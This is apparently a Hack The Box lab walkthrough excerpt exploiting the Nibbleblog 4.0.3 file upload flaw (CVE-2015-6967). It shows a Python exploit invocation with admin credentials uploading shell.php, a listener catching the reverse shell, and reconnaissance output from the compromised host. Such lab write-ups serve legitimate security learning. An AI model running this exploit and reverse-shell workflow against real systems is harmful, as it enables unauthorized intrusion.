Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)


┌──(kali㉿kali)-[~/archive/htb/labs/nibbles]
└─$ python cve-2015-6967.py --url http://$IP/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.

Running the Python exploit script, which logs in with the admin credentials and uploads shell.php as the payload

┌──(kali㉿kali)-[~/archive/htb/labs/nibbles]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.75] 55790
socket: Shell has connected! PID: 1623
 
whoami
nibbler
hostname
Nibbles
ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:67:8f  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:678f/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:678f/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:574 errors:0 dropped:0 overruns:0 frame:0
          tx packets:888 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:71855 (71.8 KB)  TX bytes:162757 (162.7 KB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:242 errors:0 dropped:0 overruns:0 frame:0
          tx packets:242 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:19928 (19.9 KB)  TX bytes:19928 (19.9 KB)

Initial foothold established as the nibbler user by exploiting CVE-2015-6967